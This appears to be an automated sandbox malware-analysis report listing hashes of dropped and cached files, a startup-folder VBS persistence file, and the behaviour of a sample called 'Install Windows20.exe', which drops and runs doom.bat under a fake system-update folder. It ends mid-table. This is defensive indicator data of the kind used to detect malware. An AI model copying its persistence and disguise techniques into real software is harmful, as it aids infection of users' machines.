| SHA512 | 5823ffcc68a976babac48cf0f701cdce99d9261163aab0563482b9b8abaa9676b22d7c8b2187367a13229fa38bd27cf96320f2bfbc569799c4c916110ab1e5df |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b74ac5b2f053489c96532d76ebce6a0b |
| SHA1 | 4cca4db68d906ea7e0ed258bbf996522d9dc7323 |
| SHA256 | a5e398595de8986393b661d2a86327d61d34ab65ea30627ec43f9fe122856554 |
| SHA512 | 5afa435f174c1c8ec81f7d3d89353e05518a66ab7e17134404fe1c32af57c8faa13fe56556e13de5a3a67b45667091755b9540b95ac3b6037f37d76def9e72c0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7ef866e9a5d3e45f200543963d7aa7b8 |
| SHA1 | 748e2fd58ccd36dd0ee7e6af711c64b5dbffdfcf |
| SHA256 | 079c1e0e7c19627004ba839d187ca9a2b5214ab2a47c238b05c1ac29f0e06848 |
| SHA512 | 938ce59d04c619a195c43c58b1648f4e0b63cae853370c02b2fdba126949fc898d9f7472c520fb4542eb64eb35192925826e89d5119f847be9119cab07936619 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e76291db861cf954e58888081073d3fc |
| SHA1 | d077424628659779b23ffb1d3cea8c38bbbea87e |
| SHA256 | 2dee0ea951aa77b90f71a8c50dc6730df5a52741c054cbb5bd42c3ea210fb594 |
| SHA512 | 235407fddcde98579f189a52ba4de403fbb2854301d84d7ef4481cdd9a847fbbee84524e6bd76cf278539b71f94c95ef959e2cb8a9c47ecaa1e8900492c9a779 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 88125157d71a6cafc5897c82b233d426 |
| SHA1 | 8ddcfa8c77de4f54ccb5c4591bf9ca0b15d4c648 |
| SHA256 | cff7beac4522b57f774fe2e87dc28eab06f9b118af4ff979d44b82b9e1b4efd5 |
| SHA512 | fea10c11be913e7ff6b971caf5f0f8924a451b85f97d4fabad7bf95f8472ff90ba89c85fe9a072cb5d12edab287e6309a44dd50dbd28f30f448ccd12edd74971 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ea87bc167891945c59e8fee28a3e9c49 |
| SHA1 | eaf9e17ab872c3e6d3c5199a5192d0a8c971d61f |
| SHA256 | ff0d23e51a802b9cdabbbbf4929cb230b96f03088ca6a165713569ac4c5e00bd |
| SHA512 | dd11de7bc5b7112d286c01fb3c415561732fbf299b81f910b63db3094706936ce4bb386cb465951e42826cac8b22400aed158a73883e0cf4f44ea1cec4e0b3d1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 33d1c41238a5202254a764e525023a93 |
| SHA1 | f409e72763e8f41241c14e80f4e21826138d6b15 |
| SHA256 | 5633a15b4abf8504c5a49e5293c761e1ddd6cfc43ca03e9834d0e0aa22dbccab |
| SHA512 | 18ad1665145b41e4fbdeb6ee4b9b4a3cb6005ecb1784430676a8e39881d68e54b8e5c19afeb7092b103b31acb302f30dbd13323f991d0779a896a77f2ad6e770 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac90ca445f963c1b5c7ab5f0f9fee8f3 |
| SHA1 | 017c18ef495bda52b4cd4f18e405ffa2ecabefef |
| SHA256 | 41058bfb835b83d3dff6689ac6c451ab89f244dcf54e23203d6fa6ef198f9be7 |
| SHA512 | 60eeaf3b11ab7c3346a13c105cb5f8f8a59ce139eded1106ab9e4b6933ee1c901d037305eaa9826b8334e17368b6474cbf357965832973ce7d4e8ec21a4e0d8f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa8b4ff8125c173232dee5f8189320c2 |
| SHA1 | 51ce4be36019c27b135b35489307b978c30631d7 |
| SHA256 | 0be64266fa05b2d1493a3a6fdee174baf963d2b7c31a900e362b3b72c6ca6074 |
| SHA512 | 037d09e709aa2815bcc66bcae15b5e16a061a65cc03c55a4554e189fc588e061fcf5d029f67a3cb03fcc6659e2b6230a570888dd409f97ae6578b705b6ee4cf2 |
memory/2208-1225-0x0000000000880000-0x0000000000881000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 8b2bac06df2ae5ed18acff64794322cd |
| SHA1 | b8f1af9de328381ed959081094fdfacfff8e6d0e |
| SHA256 | c35aa6b1e580a84f7bf1d2d2e1b279c7d8de07ba188a6bde1354fa8b296e47bd |
| SHA512 | b56bde393583990e59fc1f223febe469493fbbf6c5fe93e6c4214d7cb18767daa3771c55e51d92f6c54879b4f0d58096d63181947339ad08be3a4aa3c42e0d9c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d9d47a97c200a24a8b1e9b696e100b5c |
| SHA1 | 04754e0b36fb8fedf58eaadd329abd4806d5bf5c |
| SHA256 | 7078ae11c3d7f86878b7da03c92578b1fda59bc179ac09f0fbe2250d00ea775c |
| SHA512 | 07bc1fce2b5df5b427fe2f31a5fea36777b3b95a5e1a005d20560acec421d89f4e990eecbb77f9487bee6049a3ae95ac8d0db89ed82827aefc5fae97b139b299 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | a7b8b1e1b415b0b90ddd581578f23bfc |
| SHA1 | 37126f2fa0498108a72fa94256a5ec5eff58434e |
| SHA256 | a56357e00310bac0d4d469fe5b389ca785cd07179def9f7a478d5df7f4469cc4 |
| SHA512 | 7dfd8d03d3fe739e5ccd44a45969dadd6c7a741f7344d5dfa98eda9627dcd3b4d192c3c990071498f0309c2079bba0454e3f441a46593a2e4fb6518c7ff89f17 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | ac89a852c2aaa3d389b2d2dd312ad367 |
| SHA1 | 8f421dd6493c61dbda6b839e2debb7b50a20c930 |
| SHA256 | 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45 |
| SHA512 | c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | aef1f35caaafb59481cb93473b8a5a6b |
| SHA1 | eb8ac08e124014fe7c70616686d17b239796bcf0 |
| SHA256 | 245f47ac1d13e0eaaf60a82ed97b9ee63907d03d3319505424a235fdc926bd15 |
| SHA512 | 72e9c43487a75ef3cdb0725407e0403ce50410c4676d4a4e12feb44f50162b03d441f43580b067dc37d1da881780c64063b2983a0b96887523558898ceb115df |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3e44ebb75b614140e43b26cc888b7085 |
| SHA1 | d3858ba97beeeeab9f1ccc8e93730a86f71967fe |
| SHA256 | 2f111774dc4dd6ec452759286d491040acbd7ff4dc84cfd840b7809789dfd4eb |
| SHA512 | 6cd3641e4df636525032c5cffc9948761ac0caef9b5b3344708ef159b20df7aaf335a63de44726e168a5298760f40b9f3d29b514d0babfec560963a55f25c054 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BE7DA50ED4C167DC2E87819405C6BB24
| MD5 | 3826f72f5fe92cb1e05437441a769a6a |
| SHA1 | 32a551319a14d8038725953197f5ca46590a6478 |
| SHA256 | 22752cfe903ddbc22962d39d74f99ac5c2086612291d36e926be8cc90c9a3c02 |
| SHA512 | 46a3099fb2581427c64436df4d4a6b51a1cd33014131a65996f47c5592074c93bcda53db28305b26766add7be36f00dfeda21d2696ec6363632ea6f27f9e5492 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_BE7DA50ED4C167DC2E87819405C6BB24
| MD5 | 53c9a34bc08eeeeb2b4a89cf23f0b8fe |
| SHA1 | 0658ec2aeaf8b4963cce201389c8e8740cfdf1f5 |
| SHA256 | 3a0cbf4f359cee41b7818ccef795a174ce82ccfc6bf00463b86dbd4aa9f08a50 |
| SHA512 | 1ae8db15df66b18010cabc9f4d50834d49c2d3346593e49a35906f10cb1de4edd7c95cfc65232aa0162d7c635790805cdeeba2b5ad74fbe60e94429ceaa010f2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8d45b739bcaa1bd7d2ec329ca4aa2d4d |
| SHA1 | 81796b29e284f56fabed45416a59ef71bc0acc3c |
| SHA256 | e3b9de426974d935b2b692fd59dfa89ae01ceff8c0f1840eff10deacedfe09f5 |
| SHA512 | 6352926b321c72da524f69c9cce7cbd34c776b669218211b353d942051de363bd65430e603bc97a6dbe8f30f6fe961742c32eb9e42148adb59b6f5a6918a5057 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\api[1].js
| MD5 | d0e48e3d0045d85a0cb71725b215739d |
| SHA1 | ad0647e24920f0815162d595058df31e28430d4d |
| SHA256 | 26cd1a6781274af995e5e8cb91f7327d0817f0ec2c943e710af00ae20c80363e |
| SHA512 | 582f5605d98c48b372dfe7445b8b2abe0f339cb15f39ca625e02004a684d3c01ea5a8dd78e5eb6485ab839ff09cad364d20dd2a70a8c6d5a9e6bdd9ae16fdf01 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_91363364208F5CFFAABFD122AF4FD6BD
| MD5 | d7e3fcdcb8d6f10c005d5b63d60b9273 |
| SHA1 | c45aa9d913db06612d5f02344190f5ddc8ae6406 |
| SHA256 | bdb85b20170eb28cd465ca2b6f5f4a822de0588e4dc974facebe25d6e7f8fc74 |
| SHA512 | c2b7a01f60d8870e7607250eea667450eb05c8525c90bc3c63396447dde1d9fb35f2e3abe16b05d1af29bc607789ce193f47771d19aa831827df648102691b5a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_91363364208F5CFFAABFD122AF4FD6BD
| MD5 | a2728cd660cd65d8a0278cd14b76c206 |
| SHA1 | fc1df77863a2be41d2e2329330e793005108ac35 |
| SHA256 | 4434632226ce5c58a59cee2a22f13f2f862dcc24d7e5c2695db89d5dca2d9ef1 |
| SHA512 | a892f643e1676895ca20ece80a59ef85917fa8b66f89c57fb8c8df9c7325d9ecbf02cbf4cd2e4d9a196a747281d5be1b417209fe4db3f5bd4b57b87166fdb69e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_91363364208F5CFFAABFD122AF4FD6BD
| MD5 | 0db8e8f555dbc162623f1e34bb5128a5 |
| SHA1 | d9abd18a4cb923c77aea06618464b5a202fd4237 |
| SHA256 | 689e4c60283d14808efdb9833af90956509923c96a88368f72288231b37016ac |
| SHA512 | 30750c2f7461c01f1d634f5da1fc672bc9d35597f1bb33a0deda29895efd76cc4585674d8fbc0f8263fb80491455fda1280a26989ff3fe93308c09bad7dca026 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9M0HR0P6\recaptcha__en[1].js
| MD5 | 884d00314602d7cb55bbcd2e909f7310 |
| SHA1 | dcb353b63aefc091523915f4562a819c31463611 |
| SHA256 | 2c6a3425cec9ba0cbcfcf1dbba2120a72ac369674a6d02e06bd3b0c16efbdcf7 |
| SHA512 | 50091f9e37dcf299bc8cf9cfeed4e71709011713ca0701be0ff79c4fb42699c9f9894cbc3a0819b3fece4f698c2201d403b987e6a76a259fbf58fb19e493b87c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9M0HR0P6\favicon[2].ico
| MD5 | f3418a443e7d841097c714d69ec4bcb8 |
| SHA1 | 49263695f6b0cdd72f45cf1b775e660fdc36c606 |
| SHA256 | 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770 |
| SHA512 | 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\q905y6j\imagestore.dat
| MD5 | 1bdac49aed61c74c4c654298981fdc64 |
| SHA1 | 8078e25d4fa0e9281c59dbb309bf5fec59d736d3 |
| SHA256 | ebbf8b929361123134fefcb495f4a3647fdca3ec2163a28ac960fdde3f66ad19 |
| SHA512 | 763f79a25256b54e34d6d99a441d01359ad35b798216bd40b6dbade18db15cc75d2d48dcc1cc55f675b4adf01ba835c1441a444007eef0f85f15ee2b34639aa0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\styles__ltr[2].css
| MD5 | eb4bc511f79f7a1573b45f5775b3a99b |
| SHA1 | d910fb51ad7316aa54f055079374574698e74b35 |
| SHA256 | 7859a62e04b0acb06516eb12454de6673883ecfaeaed6c254659bca7cd59c050 |
| SHA512 | ec9bdf1c91b6262b183fd23f640eac22016d1f42db631380676ed34b962e01badda91f9cbdfa189b42fe3182a992f1b95a7353af41e41b2d6e1dab17e87637a0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\TrkBqBAA-aS2zfRFivzOT01UANX8bQoFEDiMg6e3nFU[1].js
| MD5 | e51858514367a90506a465ee3f5977f2 |
| SHA1 | 171bd8620c82ea5a18379faa738410f52a0c23ba |
| SHA256 | 4eb901a81000f9a4b6cdf4458afcce4f4d5400d5fc6d0a0510388c83a7b79c55 |
| SHA512 | ac072a1959d01c284e93cac34fbc7632ef54a522ce60b8e9546a25132a14fd34457f86bd48def48834f7523b23fe689b4fcfd4215607c3dd767a3f951bbf4472 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\DNOEZ0L1\www.google[1].xml
| MD5 | d85fd66f98ba15f6f280282137e79abc |
| SHA1 | 12f1c4581a2e5fbc9c56226031f9725fe0c9be3d |
| SHA256 | e7e65800aa5481b632bd7b1f8858ceb393133fe3fd49545627dab3d2cf687a17 |
| SHA512 | 22959a9cb52f5a394283fa4ce8b10e318a0681471f93d090d8bff53d7560ee900a814ffa9735a401e9bddfee1f9de36341e9e09a3b25b99a32f275babf6efb49 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\logo_48[1].png
| MD5 | ef9941290c50cd3866e2ba6b793f010d |
| SHA1 | 4736508c795667dcea21f8d864233031223b7832 |
| SHA256 | 1b9efb22c938500971aac2b2130a475fa23684dd69e43103894968df83145b8a |
| SHA512 | a0c69c70117c5713caf8b12f3b6e8bbb9cdaf72768e5db9db5831a3c37541b87613c6b020dd2f9b8760064a8c7337f175e7234bfe776eee5e3588dc5662419d9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\webworker[1].js
| MD5 | bcf077e54d883df9bb7dc3e0bcac3ded |
| SHA1 | 48be834541645c4f5f77789b5d5edd35ae10e83f |
| SHA256 | c8decb7c7d17d6353f74d740f2afba7886d2c53e0b3d10a44ae1ad7738316ff9 |
| SHA512 | ffe81f03493d2d9a6b2bbc2a1398b7a72be15a8e9ae9fb61eef540214b12033038517c6db72834409feb074653da6bd5c577551797fff5318569a42f6f1d769c |
memory/1920-1398-0x0000000000840000-0x0000000000841000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3BN98POM.txt
| MD5 | c006647546d69168d8d1572d6b55c3b6 |
| SHA1 | 3efee13dd70676c16c9b745c3cf82ca757a84286 |
| SHA256 | 77ea65b34419ba73ca4ac8ca1e8491ee0c15a3d8057839006f91c3ccac93fa65 |
| SHA512 | b1187b1538f7a5bf8e520f871faf8e1d0ba449d6fc11aae9f95a190eac910bcb51b25f2ada096b392621bba6c26e043ef3af53c098457c2e71d7e989b0d80ee4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 7020caea9205f57c8163aa86141d593b |
| SHA1 | 17dec16d0479eecf2571b7552615bc4637c35333 |
| SHA256 | ba39f83a6cb691dc5ccd64afb11dc5bb93df8b68a3a1ec5610575dbdd97c113c |
| SHA512 | 61149b0fe18712ae74434b9c5e2980a791048f4ccfeea2139aaee7ecca287efb68b19a08e79c5ddfd6fe20c8d95266a3d5d25cef866888dffff349e5a13a058a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BE7DA50ED4C167DC2E87819405C6BB24
| MD5 | 0353c1f441b1daa8cbc12899e553fef3 |
| SHA1 | 321ed87054fec1e9c1fad1489f421629aa837b32 |
| SHA256 | 9bfb13c76349828f1c2bbcb296cad3d539da6cd3208fdc248e565e5ff9a005e1 |
| SHA512 | fa0f33d391286a21c24c62f8a7d795b721a77fe1c1c456afa7f6c9853a8dcb63d2a22d978a3fddd9fc15ad25a881bb787a74a82325139baf7b179ba1163f715c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | 03c8ebbbd1f674ac7a2ae6a5b7d7d1d5 |
| SHA1 | edc00c697eb7076671a35ef17241b70057b0810b |
| SHA256 | 7b9e8781533a7a95a8e290e2fef414a3904edfde8271f081cb6eabaea8fc2a7e |
| SHA512 | e45f48003701a024ae9861c375761358a0cc5b0f3181fc954f7be4cbd266d136c5a7a2125f997023c255c4b806206740e05bf3ba2c97e8f7577aaa512446d25a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\KFOmCnqEu92Fr1Mu4mxP[1].ttf
| MD5 | 372d0cc3288fe8e97df49742baefce90 |
| SHA1 | 754d9eaa4a009c42e8d6d40c632a1dad6d44ec21 |
| SHA256 | 466989fd178ca6ed13641893b7003e5d6ec36e42c2a816dee71f87b775ea097f |
| SHA512 | 8447bc59795b16877974cd77c52729f6ff08a1e741f68ff445c087ecc09c8c4822b83e8907d156a00be81cb2c0259081926e758c12b3aea023ac574e4a6c9885 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\KFOlCnqEu92Fr1MmEU9fBBc9[1].ttf
| MD5 | 4d88404f733741eaacfda2e318840a98 |
| SHA1 | 49e0f3d32666ac36205f84ac7457030ca0a9d95f |
| SHA256 | b464107219af95400af44c949574d9617de760e100712d4dec8f51a76c50dda1 |
| SHA512 | 2e5d3280d5f7e70ca3ea29e7c01f47feb57fe93fc55fd0ea63641e99e5d699bb4b1f1f686da25c91ba4f64833f9946070f7546558cbd68249b0d853949ff85c5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\KFOlCnqEu92Fr1MmYUtfBBc9[1].ttf
| MD5 | 4d99b85fa964307056c1410f78f51439 |
| SHA1 | f8e30a1a61011f1ee42435d7e18ba7e21d4ee894 |
| SHA256 | 01027695832f4a3850663c9e798eb03eadfd1462d0b76e7c5ac6465d2d77dbd0 |
| SHA512 | 13d93544b16453fe9ac9fc025c3d4320c1c83a2eca4cd01132ce5c68b12e150bc7d96341f10cbaa2777526cf72b2ca0cd64458b3df1875a184bbb907c5e3d731 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
| MD5 | 076eec2d750fb2a85461d8b227b96124 |
| SHA1 | d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8 |
| SHA256 | a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4 |
| SHA512 | 5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b57bcbd41f0f728925ab0d2a4c38a8ef |
| SHA1 | 5cd0febf6ee1813bde4bc4e465dc28262106111a |
| SHA256 | eb9a72066462a0d4e6238586a9908d404b15ded9b2cdd94f97f00cca56dd0187 |
| SHA512 | e06a9e833bc17decf7ce2f8e191b511d8958299a71dd65444e4fd80c248f77cbee8f4b5a6332ae9f8ad207c10fff3bff2384db0b51dfb132bf8bbbad251791a3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2fc8497a9b508a84e1f92858ff6514fb |
| SHA1 | 31fb0616a3513f86ec9e93e613d40fa41dc0821d |
| SHA256 | 1457d3ec634348488cf9922e934fdd180209653e493c8821475248c1a38a6aed |
| SHA512 | 84cb3a4be945e5927415d9cd1497f322d9aa592574ddcbc797c0e1fd52faaa3fed87a9b1d028f48d520ecbd283205bb11408e77fd80e209a8ca6555a139121bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416
| MD5 | 55540a230bdab55187a841cfe1aa1545 |
| SHA1 | 363e4734f757bdeb89868efe94907774a327695e |
| SHA256 | d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb |
| SHA512 | c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa801eae83467e99cbd289126f4e0aba |
| SHA1 | d1fec3e86eaa22790e404ae6c307ed9b462c8472 |
| SHA256 | 65f13070cbdfec30b52e75671a4d8c687d5cf0db9e0266a8362094318bfb5364 |
| SHA512 | 47bb49cec431a4aeb84d2483079366a9afb24a969399b580676feafc168d2c6dc78ee030dca066376ba6de275c541ca1222cf475e0a259acc084e47ff6e0fdf3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a98aea1ab2122bf0d89af982f419892b |
| SHA1 | 2560b555cb4a2e15ef0c7209bdb54f8c84c36852 |
| SHA256 | e9ce612d59468c32fda4599b70ddb567f6ae9d1fdc92c7593f7801e005e92305 |
| SHA512 | b9c907b179a129fbffc77ffce0644b337d1f3ff30e7bd7421c57d3ae0813764ec8693d3e75e15376566250a40622319fe5f7d3a7614b5be74195e95676f70754 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d5495f32463d77ef4e935c7e5b71f986 |
| SHA1 | c213b0924a6a5d634b58360a4971b3fdd9faf762 |
| SHA256 | ffaea1bee1844e84d6f4d9a6ed51003e6ffe24b0d909a13b7e0af656f74f4513 |
| SHA512 | 96158c191b318fe5d67be164c1cbdc5449bf4caa2987eb0c37b149887a5b61272504c1fae081068bd3220ff814b820a9c4daeb44dfaf2e2568c29331ab94750f |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\NDIM7ZER\ww12.thisworldthesedays[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\cb=gapi[1].js
| MD5 | f4ac8ebcddf99f97b1f255e008368d12 |
| SHA1 | f49430105d72515c98afe87a26e66a5249a9a83b |
| SHA256 | 326a0170c1d2759827150de6606cf8a5a4423c9b01748de34e01cee23e523f5d |
| SHA512 | 564b6762d839946687e118a36289328deaf966261e744ed4c08001ca3601b26688ba0d1ef4b260c055e00d3f33df1653d2b51d565d367ee4a384ce9fba45aac5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\drive_2020q4_32dp[1].png
| MD5 | 916c9bcccf19525ad9d3cd1514008746 |
| SHA1 | 9ccce6978d2417927b5150ffaac22f907ff27b6e |
| SHA256 | 358e814139d3ed8469b36935a071be6696ccad7dd9bdbfdb80c052b068ae2a50 |
| SHA512 | b73c1a81997abe12dba4ae1fa38f070079448c3798e7161c9262ccba6ee6a91e8a243f0e4888c8aef33ce1cf83818fc44c85ae454a522a079d08121cd8628d00 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\q905y6j\imagestore.dat
| MD5 | daf0fb7d7f678ac0910c33a69b27f1b1 |
| SHA1 | 8f909239197fe716fefb69b06e276a0e2b9fbee0 |
| SHA256 | c73037ecadcb827c19788a70e735e57d3f04241187fad810ccaf090e1d5d640c |
| SHA512 | 2acf94f92b826edf08a2fc9411021af1134a5f546dc011b0d76f2b67adc442b6e9ce0e7c089373bad92e0d28f8df4c2cc71b4969c6c00260564c4f04357bd160 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
121s
Max time network
134s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\__tmp_rar_sfx_access_check_259411410 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\SystemUpdateInstalled\doom.bat" "
Network
Files
C:\Windows\SystemUpdateInstalled\doom.bat
| MD5 | 87ff7a4be8ba06c3d469b27fc8d665bc |
| SHA1 | 2ddb2e14bb115a85b13cfbe6204a45360c78de04 |
| SHA256 | c5e12fc8cceb6155d5176025c3aeff5e3d8aef8e54e6eabf5af43f19329a634b |
| SHA512 | 38a8d7ccc7f447b9e7b61d7f876a4f6de9782b09d1491e93bd0fcd3e15b6552cd6cfe015b020686eecea14a0951ed392abae55490b55af9c393eb02530632c35 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
113s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
